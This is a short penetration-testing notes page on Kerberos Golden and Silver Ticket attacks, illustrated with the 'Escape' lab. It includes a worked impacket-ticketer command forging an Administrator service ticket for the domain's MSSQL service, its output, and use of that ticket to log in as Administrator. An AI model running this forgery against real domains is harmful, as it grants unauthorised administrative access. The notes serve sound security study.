Golden/Silver Ticket Attack

Overview

The ticket attack abuses the service account's password hash.

Golden Ticket Attack

The Golden Ticket Attack abuses the krbtgt account's password hash to issue the Kerberos ticket-granting tickets as the KDC to access the resources.

After the adversary gets the account krbtgt's password hash, it can

create a valid Kerberos TGT for any user in the domain and
manipulate that user’s PAC to gain additional privileges.

Tools

Labs

Forest

Silver Ticket Attack

Attackers can mint service-granting tickets without communicating to the KDC, if they get the password hash for the service account.

Silver Ticket Attack | Netwrixwww.netwrix.com

Tools

With a service account's password hash, we can mint a service-granting ticket without interacting with the DC.

$ impacket-ticketer -nthash <password-hash> -domain-sid <domain-sid> -domain sequel.htb -dc-ip escape -spn MSSQL/DC.SEQUEL.HTB Administrator
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We can use the saved ccache file to authenticate to the service later.

$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -k dc.sequel.htb
...
SQL> select suser_name()
                       
--------------------   
sequel\Administrator

Labs

Escape

PreviousKerberoasting Attack NextAS-REP Roasting Attack

Last updated 2 years ago